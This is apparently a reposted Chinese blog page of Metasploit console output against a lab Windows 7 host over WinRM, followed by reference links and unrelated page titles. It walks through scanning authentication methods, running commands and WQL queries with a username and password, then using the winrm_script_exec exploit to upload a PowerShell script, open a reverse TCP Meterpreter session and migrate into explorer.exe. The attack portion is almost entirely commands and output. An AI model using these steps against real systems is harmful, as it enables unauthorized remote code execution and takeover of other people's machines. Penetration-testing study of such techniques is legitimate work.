metasploit - winrm
来源:互联网 发布:雅思书籍 知乎 编辑:程序博客网 时间:2024/05/19 11:37
msf auxiliary(winrm_auth_methods) > show optionsModule options (auxiliary/scanner/winrm/winrm_auth_methods): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN WORKSTATION yes The domain to use for Windows authentification Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.103 yes The target address range or CIDR identifier RPORT 5985 yes The target port THREADS 1 yes The number of concurrent threads URI /wsman yes The URI of the WinRM service VHOST no HTTP server virtual hostmsf auxiliary(winrm_auth_methods) > run[+] 192.168.1.103:5985: Negotiate protocol supported[+] 192.168.1.103:5985: Basic protocol supported[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf auxiliary(winrm_cmd) > show optionsModule options (auxiliary/scanner/winrm/winrm_cmd): Name Current Setting Required Description ---- --------------- -------- ----------- CMD whoami yes The windows command to run DOMAIN WORKSTATION yes The domain to use for Windows authentification PASSWORD password yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.103 yes The target address range or CIDR identifier RPORT 5985 yes The target port SAVE_OUTPUT false yes Store output as loot THREADS 1 yes The number of concurrent threads URI /wsman yes The URI of the WinRM service USERNAME lab yes The username to authenticate as VHOST no HTTP server virtual hostmsf auxiliary(winrm_cmd) > run[+] sec\lab[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf auxiliary(winrm_wql) > show optionsModule options (auxiliary/scanner/winrm/winrm_wql): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN WORKSTATION yes The domain to use for Windows authentification NAMESPACE /root/cimv2/ yes The WMI namespace to use for queries PASSWORD password yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.103 yes The target address range or CIDR identifier RPORT 5985 yes The target port THREADS 1 yes The number of concurrent threads URI /wsman yes The URI of the WinRM service USERNAME lab yes The username to authenticate as VHOST no HTTP server virtual host WQL Select Name,Status from Win32_Service yes The WQL query to runmsf auxiliary(winrm_wql) > run[+] Select Name,Status from Win32_Service (192.168.1.103)===================================================== Name Status ---- ------ ALG OK AeLookupSvc OK AppIDSvc OK AppMgmt OK ...... ......
msf exploit(winrm_script_exec) > show optionsModule options (exploit/windows/winrm/winrm_script_exec): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN WORKSTATION yes The domain to use for Windows authentification FORCE_VBS false yes Force the module to use the VBS CmdStager PASSWORD password yes A specific password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.1.103 yes The target address RPORT 5985 yes The target port URI /wsman yes The URI of the WinRM service USERNAME lab yes A specific username to authenticate as VHOST no HTTP server virtual hostExploit target: Id Name -- ---- 0 Windowsmsf exploit(winrm_script_exec) > run[*] Started reverse TCP handler on 192.168.1.102:4444 [*] checking for Powershell 2.0[-] You selected an x86 payload for an x64 target...trying to run in compat mode[*] Attempting to set Execution Policy[+] Set Execution Policy Successfully[*] Grabbing %TEMP%[*] Uploading powershell script to C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...[*] Attempting to execute script...[*] Sending stage (957487 bytes) to 192.168.1.103[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at 2015-12-26 15:37:13 +0800meterpreter > [*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'[*] Current server process: powershell.exe (1836)[*] Attempting to move into explorer.exe for current user...[+] Migrating to 2844[+] Successfully migrated to process 2844meterpreter > sysinfoComputer : SECOS : Windows 7 (Build 7600).Architecture : x64System Language : zh_CNDomain : WORKGROUPLogged On Users : 1Meterpreter : x64/win64
References
- https://social.technet.microsoft.com/Forums/windowsserver/en-US/e5f8cfee-d4a6-4e5c-9baf-e8a8a67d9316/winrm-access-denied
- https://community.rapid7.com/community/metasploit/blog/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit
- http://blogs.technet.com/b/jonjor/archive/2009/01/09/winrm-windows-remote-management-troubleshooting.aspx
- http://pubs.vmware.com/orchestrator-plugins/index.jsp?topic=%2Fcom.vmware.using.powershell.plugin.doc_10%2FGUID-D4ACA4EF-D018-448A-866A-DECDDA5CC3C1.html
0 0
- metasploit - winrm
- Metasploit
- Metasploit
- Metasploit
- Windows 远程管理WinRM
- Windows 远程管理WinRM
- 使用Powershell远程管理Windows Server(WinRM)
- 用Powershell远程管理Windows Server(WinRM)
- Metasploit使用说明
- HTTP METASPLOIT
- Metasploit Framework
- metasploit-unleashed
- Metasploit Support
- metasploit video
- metasploit vpn
- metasploit更新
- Metasploit简介
- metasploit使用
- CocoaPods安装使用心得,分享给墙内的朋友们
- ios学习--XCode标准Framework静态库制作方法 & 工程转Framework静态库加xib和图片的完美解决方案
- JavaScript—内置对象
- 源代码管理工具之 SVN
- Win7+VS2013环境下编译OpenSceneGraph-3.4.0
- metasploit - winrm
- Union All拼接Sql语句做批量添加
- Servlet中的过滤器Filter详解
- Win10+CentOS6.5双系统安装
- 浅谈自定义View的宽高获取
- arm9+linux fl2440 的编译驱动时遇到的问题
- 调试-计时函数
- Xcode添加代码片段
- C++实现的小型图书管理系统